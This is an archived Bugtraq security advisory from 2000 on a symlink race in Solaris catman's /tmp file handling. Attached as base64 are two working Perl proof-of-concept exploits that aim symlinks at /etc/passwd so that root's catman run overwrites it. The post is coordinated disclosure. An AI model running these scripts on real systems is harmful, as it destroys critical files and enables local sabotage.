[18191] in bugtraq
Catman file clobbering vulnerability Solaris 2.x
daemon@ATHENA.MIT.EDU (Larry W. Cashdollar)
Tue Dec 19 18:13:07 2000
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="0-532600819-977201549=:19155"
Message-ID: <Pine.SOL.4.21.0012182049560.19155-300000@Vapid.dhs.org>
Date: Mon, 18 Dec 2000 20:52:29 -0800
Reply-To: "Larry W. Cashdollar" <lwc@VAPID.DHS.ORG>
From: "Larry W. Cashdollar" <lwc@VAPID.DHS.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
--0-532600819-977201549=:19155
Content-Type: TEXT/PLAIN; charset=US-ASCII
Solaris 2.7/2.8 catman temp file vulnerability.
Larry W. Cashdollar
Vapid Labs
Date Published: 12/18/2000
Advisory ID: 11242000-02
Risk: Low
Title: catman temp file vulnerability.
Class: insecure temp file handling.
Remotely Exploitable: no
Locally Exploitable: Yes
Vulnerability Description:
Through the use of symlinking temporary files created by /usr/bin/catman
upon execution by root a local user can clobber root owned files.
Vulnerable Packages/Systems: Solaris 2.x Sparc/x86
Solution/Vendor Information/Workaround:
The vendor is currently working on releasing a patch. See references
section for Vendor contact information.
Sun BugID: 4392144
Vendor notified on: 11/23/2000
Credits:
I alerted sun to this issue 11/23/2000 they responded 11/24/2000. Kudos
to the Sun Engineering group. This response time should be a model to
other vendors.
Technical Description:
The catman command creates preformatted versions of the online
manual. It also creates the windex database for utilities like apropos
and whatis. The problem lies with catman creating a temporary file in
/tmp, the file has the form of /tmp/sman_pidofcatman. An attacker can
monitor the process list for the execution of catman and create a symlink
to a root owned file. catman will upon execution overwrite the contents
of that file. This is a new bug for catman and is not addressed in the
current patch cluster for Solaris 2.7 Sparc.
Exploit/Concept Code: see attachments.
References:
Sun Microsystems.
http://www.sun.com
Vapid Labs.
http://vapid.betteros.org
Email: Larry W. Cashdollar <lwc@vapid.betteros.org>
DISCLAIMER:
The contents of this advisory are copyright (c) 2000 Larry W. Cashdollar and
may be distributed freely provided that no fee is charged for this
distribution and proper credit is given.
Ver 2.4 11/29/2000
--0-532600819-977201549=:19155
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="catman-race.pl"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.SOL.4.21.0012182052290.19155@Vapid.dhs.org>
Content-Description:
Content-Disposition: attachment; filename="catman-race.pl"
IyEvdXNyL2xvY2FsL2Jpbi9wZXJsIC13IA0KIyBUaGUgcHJvYmxlbSBpcyBj
YXRtYW4gY3JlYXRlcyBmaWxlcyBpbiAvdG1wIGluc2VjdXJseS4gVGhleSBh
cmUgYmFzZWQgb24gdGhlIA0KIyBQSUQgb2YgdGhlIGNhdG1hbiBwcm9jZXNz
LCAgY2F0bWFuIHdpbGwgaGFwcGlseSBjbG9iYmVyIGFueSBmaWxlcyB0aGF0
IGFyZSANCiMgc3ltbGlua2VkIHRvIHRoYXQgZmlsZS4NCiMgVGhlIGlkZWEg
b2YgdGhpcyBzY3JpcHQgaXMgdG8gY3JlYXRlIGEgYmxvY2sgb2Ygc3ltbGlu
a3MgdG8gdGhlIHRhcmdldCBmaWxlIA0KIyB3aXRoIHRoZSBjdXJyZW50IFBJ
RCAgYXMgYSBzdGFydGluZyBwb2ludC4gIERlcGVuZGluZyBvbiB3aGF0IGxv
YWQgeW91cg0KIyBzeXN0ZW0gaGFzIHRoaXMgY3JlYXRlcyAxMDAwIGZpbGVz
IGluIC90bXAgYXMgc21hbl8kY3VycmVudHBpZCArIDEwMDAuDQojIFRoZSBk
cmF3YmFjayBpcyB5b3Ugd291bGQgaGF2ZSB0byBrbm93IGFyb3VuZCB3aGVu
IHJvb3Qgd291bGQgYmUgZXhlY3V0aW5nIA0KIyBjYXRtYW4uIA0KIyBBIGJl
dHRlciBzb2x1dGlvbiB3b3VsZCBiZSB0byBtb25pdG9yIGZvciB0aGUgY2F0
bWFuIHByb2Nlc3MgYW5kIGNyZWF0ZSB0aGUgDQojIGxpbmsgYmVmb3JlIGNh
dG1hbiBjcmVhdGVzIHRoZSBmaWxlLiAgSSB0aGluayB0aGlzIGlzIGEgcmVh
bGx5IHNtYWxsIHdpbmRvdyANCiMgaG93ZXZlci4gVGhpcyB3b3JrZWQgb24g
YSBwYXRjaGVkIFNvbGFyaXMgMi43IGJveCAoQXVndXN0IDIwMDAgcGF0Y2gN
CiMgY2x1c3RlcikNCiMgU3VuT1Mgcm9vdGFiZWdhIDUuNyBHZW5lcmljXzEw
NjU0MS0xMiBzdW40dSBzcGFyYyBTVU5XLFVsdHJhLTENCiMgbHdjQHZhcGlk
LmJldHRlcm9zLm9yZyAgIDExLzIxLzIwMDAgICBWYXBpZCBMYWJzLg0KIyBo
dHRwOi8vdmFwaWQuYmV0dGVyb3Mub3JnDQoNCiRjbG9iYmVyID0gIi9ldGMv
cGFzc3dkIjsgI2ZpbGUgdG8gY2xvYmJlcg0KJFg9Z2V0cGdycCgpOw0KJFhj
PSRYOyAjQ29uc3RhbnQNCiRZPSRYKzEwMDA7I0NvbnN0YW50DQoNCndoaWxl
KCRYIDwgJFkpIHsNCg0KcHJpbnQgIkxpbmtpbmcgL3RtcC9zbWFuXyRYIHRv
ICRjbG9iYmVyIDoiOyANCiMgQ2hhbmdlICRjbG9iYmVyIHRvIHdoYXQgeW91
IHdhbnQgdG8gY2xvYmJlci4NCmlmIChzeW1saW5rICgkY2xvYmJlciwgIi90
bXAvc21hbl8kWCIpKSB7DQoJcHJpbnQgIlN1Y2Vzc1xuIjsNCn0NCiAJZWxz
ZSB7IHByaW50ICJmYWlsZWQsIEJ1c3kgc3lzdGVtP1xuIjt9DQokWD0kWCsx
Ow0KfQ0KDQoNCiNXYXRjaCAvdG1wIGFuZCBzZWUgaWYgY2F0bWFuIGlzIGV4
ZWN1dGVkIGluIHRpbWUuDQoNCndoaWxlKDEpICB7DQoNCiRsaXN0ID0gIi91
c3IvYmluL2xzIC1sIC90bXAgfCBncmVwIHNtYW58Z3JlcCByb290IHwiOw0K
DQpvcGVuIChsaXN0LCRsaXN0KSBvciAiZGllIGNhbnQgb3BlbiBscy4uLlxu
IjsNCg0Kd2hpbGUoPGxpc3Q+KSB7DQoJQGFyZ3MgPSBzcGxpdCAiXyIsJF87
DQoJY2hvcCAoJGFyZ3NbMV0pOw0KICAgIGlmICgkYXJnc1sxXSA+PSAkWGMg
JiYgJGFyZ3NbMV0gPD0gJFkpew0KCQlwcmludCAiTG9va3MgbGlrZSBwaWQg
JGFyZ3NbMV0gaXMgdGhlIHdpbm5lclxuIGNsZWFuaW5nLi4uLlxuIjsgDQoJ
CWAvdXNyL2Jpbi9ybSAtZiAvdG1wL3NtYW4qYDsNCgkJZXhpdCgxKTsNCiAg
ICB9DQogIH0NCn0NCg==
--0-532600819-977201549=:19155
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="ctman-race2.pl"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.SOL.4.21.0012182052291.19155@Vapid.dhs.org>
Content-Description:
Content-Disposition: attachment; filename="ctman-race2.pl"
IyEvdXNyL2xvY2FsL2Jpbi9wZXJsIC13IA0KIyBUaGUgcHJvYmxlbSBpcyBj
YXRtYW4gY3JlYXRlcyBmaWxlcyBpbiAvdG1wIGluc2VjdXJseS4gVGhleSBh
cmUgYmFzZWQgb24gdGhlIFBJRCBvZiB0aGUgY2F0bWFuDQojIHByb2Nlc3Ms
ICBjYXRtYW4gd2lsbCBoYXBwaWx5IGNsb2JiZXIgYW55IGZpbGVzIHRoYXQg
YXJlIHN5bWxpbmtlZCB0byB0aGF0IGZpbGUuDQojIFRoZSBpZGVhIG9mIHRo
aXMgc2NyaXB0IGlzIHRvIHdhdGNoIHRoZSBwcm9jZXNzIGxpc3QgZm9yIHRo
ZSBjYXRtYW4gcHJvY2VzcywgDQojIGdldCB0aGUgcGlkIGFuZCBDcmVhdGUg
YSBzeW1saW5rIGluIC90bXAgdG8gb3VyIGZpbGUgdG8gYmUNCiMgY2xvYmJl
cmVkLiAgVGhpcyBleHBsb2l0IGRlcGVuZHMgb24gc3lzdGVtIHNwZWVkIGFu
ZCBwcm9jZXNzIGxvYWQuICAgDQojIFRoaXMgd29ya2VkIG9uIGEgcGF0Y2hl
ZCBTb2xhcmlzIDIuNyBib3ggKEF1Z3VzdCAyMDAwIHBhdGNoIGNsdXN0ZXIp
DQojIFN1bk9TIHJvb3RhYmVnYSA1LjcgR2VuZXJpY18xMDY1NDEtMTIgc3Vu
NHUgc3BhcmMgU1VOVyxVbHRyYS0xDQojIGx3Y0B2YXBpZC5iZXR0ZXJvcy5v
cmcgICAxMS8yMS8yMDAwICAgVmFwaWQgTGFicy4NCiMgaHR0cDovL3ZhcGlk
LmJldHRlcm9zLm9yZw0KDQoNCg0KJGNsb2JiZXIgPSAiL2V0Yy9wYXNzIjsN
CndoaWxlKDEpIHsNCm9wZW4gcHMsInBzIC1lZiB8IGdyZXAgLXYgZ3JlcCB8
Z3JlcCAtdiBQSUQgfCI7DQoNCndoaWxlKDxwcz4pIHsNCkBhcmdzID0gc3Bs
aXQgIiAiLCAkXzsNCg0KaWYgKC9jYXRtYW4vKSB7IA0KCXByaW50ICJTeW1s
aW5raW5nIHNtYW5fJGFyZ3NbMV0gdG8gICRjbG9iYmVyXG4iOw0KCXN5bWxp
bmsoJGNsb2JiZXIsIi90bXAvc21hbl8kYXJnc1sxXSIpOw0KCWV4aXQoMSk7
DQogICB9DQogfQ0KDQp9DQo=
--0-532600819-977201549=:19155--
